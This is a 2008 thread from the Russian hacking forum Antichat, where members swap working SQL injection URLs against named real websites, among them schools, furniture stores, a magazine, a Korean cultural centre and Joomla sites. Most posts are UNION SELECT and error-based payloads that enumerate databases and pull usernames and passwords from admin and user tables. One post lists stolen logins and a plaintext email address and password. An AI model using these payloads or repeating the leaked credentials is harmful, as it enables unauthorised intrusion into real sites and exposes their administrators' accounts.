Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.04.2008, 00:15
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от Against-C*
_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...
хы странно вроде order by проверяю количество полей 9
http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+9/*
http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+10/*
а при http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+union+select+1 ,2,3,4,5,6,7,8,9/* ошибка
|
|
|
18.04.2008, 00:15
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Сообщение от Against-C*
_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...
версия мускула предположительно == 4
табл 1
посимвольный брут нужен
|
|
|
|
18.04.2008, 00:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
gibson,ZET36
3 ветка union не пашет отсюда и ошибка
_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+and+substring( version(),1,1)=3/*
А вообще вопросы-соседняя тема
Последний раз редактировалось jokester; 18.04.2008 в 00:24..
|
|
|
|
18.04.2008, 01:40
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Йога: кундалини йога, хатха йога, трай йога, медитации, йога для детей, беременных, асана, чакры, мантры
Код:
http://www.kundalini.ru/parts.php?id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4/*
Ниче личного, господа. Просто скуля,а то народ иногда возмущается что мол затрагиваю....
Код:
http://www.bikenut.com.au/parts.php?id=9999999999999/**/UNION/**/SELECT/**/1/*
тот же stox CMS, есть таблица users, дальше не смотрел
============================
Журнал "Наука и религия" Официальный сайт
http://www.n-i-r.ru/nir3.php?id_pdstat=999999999+UNION+SELECT+1,versio n(),3,4,5/*
Код:
http://melitopol.ru/mel/is.php?n_is=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
5.0.45-Max-log
Код:
http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Последний раз редактировалось bag; 18.04.2008 в 02:46..
|
|
|
|
18.04.2008, 13:14
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
to bag
Код:
http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Код:
http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(char(58),name,username,password,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users2+limit+0,1/*
Помойму вот так намного лудше  Пассы храняться в открытом виде 
Старайтесь раскрутить полностью инъекцию а не только подбирать колнки.
Последний раз редактировалось Extremal; 18.04.2008 в 13:19..
|
|
|
|
18.04.2008, 17:38
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Межшкольный Эстетический Центр
Код:
http://www.mec-krasnodar.ru/content.php?id=999999999'/**/UNION/**/SELECT/**/1/*
photoisland
Код:
http://www.photoisland.net/pi_art_text.php?lng=1&article_id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6/*
Компания GFI разработчик игр
Код:
http://www.gfi.su/index1.php?langid=1&idt=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Психологический навигатор
Код:
http://www.psynavigator.ru/articles.php?code=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*
версия бд - 5
Медицинское оборудование
Код:
http://diamedcom.ru/php/content.php?group=1&id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Formul.Ru Итальянская мебель,кухни из Италии, кровати, гостиные, спальни,кухонные мойки, матрасы
Код:
http://www.formul.ru/privacy.php?n=999999999'/**/UNION/**/SELECT/**/1,2,3,4/*
Доски объявлений. Бесплатная доска объявлений
Код:
http://www.1000dosok.ru/doski.php?kr=999999999'/**/UNION/**/SELECT/**/1/*
Производство и продажа шкафов купе, заказ прихожих, гардеробных и обувниц
Код:
http://www.s-m-c.ru/about/index.php?idmenu=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*
ООО "Форпост" - продажа мебели оптом и в розницу
Код:
http://www.forpost-perm.ru/spec.php?action=detail&id=999999999/**/UNION/**/SELECT/**/1/*
mebelshop.kiev.ua | магазин мебели
Код:
http://mebelshop.com.ua/index_office.php?param=38&chair_marka=999999999/**/UNION/**/SELECT/**/1,2,3/*
мебель для кухни
Код:
http://www.mebelhall.ru/gallery.php?menu=kux&foto=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Мебель: стулья, столы, журнальные столики, кресла, диваны
Код:
http://anymebel.ru/index.php?shops=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Мебель на любой вкус
Код:
http://mebel-miheeff.ru/catalog.php?cat=999999999/**/UNION/**/SELECT/**/1/*
со скулями ухожу в бессрочный отпуск)))
RuDDicK, боян это када выложенная тобой тема уже выкладывалась или обсуждалась и ты ее повторяешь.
Последний раз редактировалось bag; 18.04.2008 в 18:49..
|
|
|
|
18.04.2008, 18:13
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
Сообщение от Extremal
to bag
Старайтесь раскрутить полностью инъекцию а не только подбирать колнки.
без проблем:
|
|
|
|
18.04.2008, 21:33
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 4
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=system_user--
generaluser
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=db_name()--
preview_kccla
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+ta ble_name+from+information_schema.tables)--
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+ta ble_name+from+information_schema.tables+where+tabl e_name+not+in+('STATUS','Admin','Admin_Login','Adm in_Login_Level'))--
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Admin'+and+column_name+not+in+('AID','Pa ssword'))--
http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Admin_Login'+and+column_name+not+in+('ID ','AdminID','Login','IP','Date_Time'))--
Криважопая база, складывается такое впечатление что данные находятся не в своих столбцах
так например в id хранятся мылы и то не с первой записи, а первая пуста. И логины вроде в AdminID короче что попало(
это логины один какой-то подходит к пасу ниже
logins:
adminweb
adminkcc
adminpat
pat4896
id:josh@kccla.org
pass:choi1979
|
|
|
|
19.04.2008, 00:31
|
|
Участник форума
Регистрация: 22.11.2007
Сообщений: 159
Провел на форуме:
732568
Репутация:
156
|
|
http://www.photoshopchop.com/tutorials/viewcat.php?id=10/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/139,1/*
http://www.tutorial-s.com/viewcat.php?id=4/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4985,1/*
http://readtutorials.com/viewcat.php?id=184/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4111,1/*
http://www.capitaltutorials.com/viewcat.php?id=7/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/1171,1/*
Последний раз редактировалось reversys; 19.04.2008 в 01:23..
|
|
|
|
19.04.2008, 16:23
|
|
Новичок
Регистрация: 27.03.2007
Сообщений: 10
Провел на форуме:
125548
Репутация:
13
|
|
От меня немножко уязвимостей в Joomla:
http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+maybach_users/*
http://www.el-edu.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
